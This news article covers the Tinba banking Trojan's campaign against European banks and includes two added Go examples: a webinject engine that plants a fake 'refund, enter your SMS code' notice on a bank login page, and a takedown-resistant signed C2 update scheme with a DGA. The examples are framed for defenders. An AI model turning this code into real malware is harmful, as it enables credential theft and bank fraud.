Writing on IBM's Security Intelligence blog earlier today, product and risk management expert Ori Bach gave an overview of how the 'tiny banker' malware, first discovered in 2012 when, at just 20kB, it was the smallest banking Trojan in circulation, has been spreading ever since its source code was publicly leaked in July 2014.
He says that gangs have subsequently been able to rework and tweak the ready-made malicious code at no extra cost, citing the firm's own evidence from last September of 'several' campaigns launching Tinba attacks around the globe. These variants, says Bach, sported "significant improvements to the original code."
Eight months on, IBM Security Trusteer researchers have gone on to discover a new Tinba infection campaign targeting Poland, Italy, the Netherlands and Germany. Nearly half of the recognised incidents were focused on Poland (45 percent), with Italy a distant second (21 percent). Websense confirmed Poland as the most heavily infected country in an email to SC.
The number of UK incidents is unknown, although one source said the malware would likely be targeting banks in the City. Towards the end of last year, Avast researchers found that a variant was infecting customers of US and global banks, including Bank of America, JP Morgan Chase, HSBC and ING, via the Rig Exploit Kit.
After infection, Tinba comes into action when the user tries to log into one of the targeted banks. The malware's webinjects are launched, and victims may see fake messages and web forms asking for log-in credentials, personal information or permission to transfer funds. Because the injection happens inside the browser, after the connection has been decrypted, the fake content appears within the bank's genuine HTTPS-protected page. The notice may even attempt to convince users that money has been added to their account accidentally and must be refunded to the bank immediately.
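To make the mechanism concrete, the following is an added example (not code from the article, IBM or any Tinba sample) that parses a webinject configuration in the Zeus-style text format many banking Trojans share, which this example assumes for Tinba, and applies it to a constructed login page. The config, the page, the URL mask and the "refund" notice are all constructed for illustration; real configs are encrypted and far longer.

```go
package main

import (
	"fmt"
	"strings"
)

// Inject is one webinject rule in the Zeus-style format assumed here.
type Inject struct {
	Mask   string // set_url mask; '*' matches any run of characters
	Before string // data_before: injection point starts after this text
	After  string // data_after: if set, page content up to here is replaced
	Body   string // data_inject: HTML spliced into the page
}

// ParseConfig reads the text between each data_* marker and its data_end.
func ParseConfig(cfg string) []Inject {
	var rules []Inject
	lines := strings.Split(cfg, "\n")
	for i := 0; i < len(lines); i++ {
		line := strings.TrimSpace(lines[i])
		switch line {
		case "data_before", "data_after", "data_inject":
			var buf []string
			for i++; i < len(lines) && strings.TrimSpace(lines[i]) != "data_end"; i++ {
				buf = append(buf, lines[i])
			}
			if len(rules) == 0 {
				continue // a data block before any set_url has no rule to attach to
			}
			cur := &rules[len(rules)-1]
			text := strings.Join(buf, "\n")
			switch line {
			case "data_before":
				cur.Before = text
			case "data_after":
				cur.After = text
			default:
				cur.Body = text
			}
		default:
			if f := strings.Fields(line); len(f) >= 2 && f[0] == "set_url" {
				rules = append(rules, Inject{Mask: f[1]}) // trailing flags (e.g. "GP") ignored here
			}
		}
	}
	return rules
}

// MatchMask implements the '*' wildcard matching used by set_url masks.
func MatchMask(mask, url string) bool {
	parts := strings.Split(mask, "*")
	if len(parts) == 1 {
		return mask == url
	}
	if !strings.HasPrefix(url, parts[0]) {
		return false
	}
	rest := url[len(parts[0]):]
	for _, p := range parts[1 : len(parts)-1] {
		idx := strings.Index(rest, p)
		if idx < 0 {
			return false
		}
		rest = rest[idx+len(p):]
	}
	return strings.HasSuffix(rest, parts[len(parts)-1])
}

// Apply runs every matching rule against the page the browser received and
// returns the page the victim will see plus the number of rules that fired.
func Apply(rules []Inject, url, page string) (string, int) {
	fired := 0
	for _, r := range rules {
		if !MatchMask(r.Mask, url) {
			continue
		}
		start := strings.Index(page, r.Before)
		if start < 0 {
			continue
		}
		start += len(r.Before)
		end := start
		if r.After != "" { // replace everything between the two markers
			off := strings.Index(page[start:], r.After)
			if off < 0 {
				continue
			}
			end = start + off
		}
		page = page[:start] + r.Body + page[end:]
		fired++
	}
	return page, fired
}

// Constructed sample config: the "overpaid, please refund" notice the article
// describes, shown only on the bank's login page.
const SampleConfig = `set_url https://bank.example/login* GP
data_before
<input type="password" name="pw">
data_end
data_after
data_end
data_inject
<p class="notice">Refund: 1,250 EUR was credited to your account in error.
Confirm the return transfer with your SMS code: <input name="sms"></p>
data_end
`

// Constructed sample page as the bank's server actually sent it.
const SamplePage = `<form action="/login" method="post">
<input type="text" name="user">
<input type="password" name="pw">
<button>Log in</button>
</form>`

func main() {
	rules := ParseConfig(SampleConfig)
	for _, u := range []string{"https://bank.example/login?lang=pl", "https://bank.example/contact"} {
		out, n := Apply(rules, u, SamplePage)
		fmt.Printf("%s: %d rule(s) fired\n%s\n\n", u, n, out)
	}
}
```

The point for defenders is in the second URL: nothing fires off the targeted page, and the server's own HTML and logs stay clean for both, which is why page-integrity checks in the browser and transaction-behaviour analytics, not server-side log review, are the controls that catch this.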
However, the creators of the latest variant, wary perhaps of law-enforcement takedowns and botnet hijacking, have also incorporated new fall-back mechanisms to make sure the botnet remains intact. These safeguards include: public-key signing, so that bot commands and updates are only accepted if they come from the authorised botmaster; bots authenticating the update server before accepting a new configuration; a "machine-dependent encryption layer" for each bot, to stop security researchers spoofing bots; and bots communicating with hard-coded resource URLs, falling back to URLs produced by a domain generation algorithm (DGA) when necessary.
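The following added example (written for this page, not code from the article, IBM or any Tinba sample) models why those safeguards frustrate a takedown: the bot carries only the botmaster's public key, so whoever seizes a C2 domain can neither answer the bot's authentication challenge nor push a new configuration, and hard-coded hosts are tried before the DGA list. The sequence-number replay check, the nonce challenge, the Ed25519 choice and the DGA are all assumptions of this example; the DGA in particular is a hypothetical stand-in, not Tinba's algorithm, and the machine-dependent encryption layer is not modelled.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Update is a configuration envelope as a bot would fetch it from a C2 host.
// The sequence number is an assumption of this example; it stops an old,
// genuinely signed configuration from being replayed to roll a bot back.
type Update struct {
	Seq     uint32
	Payload []byte
	Sig     []byte // Ed25519 signature over digest(Seq, Payload)
}

var (
	ErrBadSig = errors.New("update rejected: signature does not verify under the embedded botmaster key")
	ErrReplay = errors.New("update rejected: sequence number is not newer than the current config")
)

// digest binds the sequence number and payload together before signing.
func digest(seq uint32, payload []byte) []byte {
	h := sha256.New()
	var b [4]byte
	binary.BigEndian.PutUint32(b[:], seq)
	h.Write(b[:])
	h.Write(payload)
	return h.Sum(nil)
}

// NewKeypair generates an Ed25519 keypair (botmaster side).
func NewKeypair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// SignUpdate is the botmaster side: only the holder of priv can produce a
// signature the bots will accept.
func SignUpdate(priv ed25519.PrivateKey, seq uint32, payload []byte) Update {
	return Update{Seq: seq, Payload: payload, Sig: ed25519.Sign(priv, digest(seq, payload))}
}

// SignNonce is the server's answer to the bot's authentication challenge.
func SignNonce(priv ed25519.PrivateKey, nonce []byte) []byte {
	return ed25519.Sign(priv, nonce)
}

// Bot models the client-side checks; MasterPub is baked into the binary.
type Bot struct {
	MasterPub ed25519.PublicKey
	LastSeq   uint32
	Config    []byte
	Hardcoded []string // C2 hosts compiled into the sample (constructed)
	Seed      uint32   // DGA seed compiled into the sample (constructed)
}

// ServerAuthentic checks the server's signature over a fresh nonce the bot sent.
func (b *Bot) ServerAuthentic(nonce, sig []byte) bool {
	return ed25519.Verify(b.MasterPub, nonce, sig)
}

// Accept installs an update only if it is signed by the botmaster and newer.
func (b *Bot) Accept(u Update) error {
	if !ed25519.Verify(b.MasterPub, digest(u.Seq, u.Payload), u.Sig) {
		return ErrBadSig
	}
	if u.Seq <= b.LastSeq {
		return ErrReplay
	}
	b.LastSeq, b.Config = u.Seq, u.Payload
	return nil
}

// DGADomains derives n deterministic names from the seed and a day counter.
// Hypothetical illustrative DGA, not Tinba's real algorithm.
func DGADomains(seed, day uint32, n int) []string {
	out := make([]string, 0, n)
	for i := 0; i < n; i++ {
		var in [12]byte
		binary.BigEndian.PutUint32(in[0:4], seed)
		binary.BigEndian.PutUint32(in[4:8], day)
		binary.BigEndian.PutUint32(in[8:12], uint32(i))
		h := sha256.Sum256(in[:])
		name := make([]byte, 12)
		for j := range name {
			name[j] = 'a' + h[j]%26
		}
		out = append(out, string(name)+".example")
	}
	return out
}

// C2Candidates is the contact order: hard-coded hosts first, DGA names only
// as a fall-back if those are sinkholed or down.
func (b *Bot) C2Candidates(day uint32) []string {
	return append(append([]string{}, b.Hardcoded...), DGADomains(b.Seed, day, 5)...)
}

func main() {
	masterPub, masterPriv := NewKeypair()
	_, seizedPriv := NewKeypair() // whoever seized the C2 domain, but not the botmaster's key
	bot := &Bot{MasterPub: masterPub, Hardcoded: []string{"cdn-update.example"}, Seed: 0x1234}

	nonce := []byte("constructed-nonce-01")
	fmt.Println("genuine server:", bot.ServerAuthentic(nonce, SignNonce(masterPriv, nonce)),
		"impostor server:", bot.ServerAuthentic(nonce, SignNonce(seizedPriv, nonce)))
	fmt.Println("impostor update:", bot.Accept(SignUpdate(seizedPriv, 1, []byte("uninstall"))))
	fmt.Println("genuine update:", bot.Accept(SignUpdate(masterPriv, 1, []byte("inject=v2"))))
	fmt.Println("replayed update:", bot.Accept(SignUpdate(masterPriv, 1, []byte("inject=v1"))))
	fmt.Println("contact order:", bot.C2Candidates(16000))
}
```

Seizing the hard-coded host or pre-registering the DGA names therefore only silences the bots; it does not let a third party repurpose or cleanly uninstall them, which is the resilience the article describes.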
As well as this additional resilience and the increased size (commentators now say new variants are up to 200kB), the latest campaign sees the threat actors shift their focus away from US banks and towards European ones.
“Cyber-criminals such as the Dyre gang have been able to overcome language barriers and adapt their tactics to attack local banks,” reads the IBM Trusteer blog post. “While this trend may prove a challenge to many banks who have not yet hardened their defences, it also provides an opportunity for those institutions to take advantage of the lessons learned having combated this malware elsewhere.”
Bach later told SCMagazineUK.com: "We see attackers constantly evolving their attack techniques to ensure their success. They go where the money is and where they can be successful. In this campaign, fraudsters must adapt the malware for the countries they're targeting. This includes modifying it for language specificity, adapting its inner workings for local banking security measures, adding a mobile component to steal SMS authentication, and more."
Chris Boyd, malware intelligence analyst at Malwarebytes, said in an email to SC:
“Tinba combines a light footprint with advanced techniques - protection against others taking control of the bot network works equally as well against scammers trying to swipe profits as it does researchers trying to shut a network down. Additionally, the fraudulent "you have overpaid" messages are right out of the spear phishing playbook, and likely to fool most people viewing it.
“We hear so much about banking threats in relation to Brazil and the US that European-centric attacks tend to get glossed over - this is a timely reminder that no bank customer is 100 percent safe from the possibility of being targeted. It's an indicator of the fact that criminals continue to learn from the commercial world, which has figured out that localisation is a good way of convincing people to download and click on things.”
Marco Morana, managing director of Minded Security UK, and SVP of risk and controls for Citi Bank London, said in conversation with SC earlier that security teams shouldn't be chasing new malware families. “Rather we should approach this on a risk-based approach, based on threat modelling,” he said.
He said this attack was proof that the actors behind Tinba are “not just going after consumers, but commercial banks too. They're going after the big money for fraud.”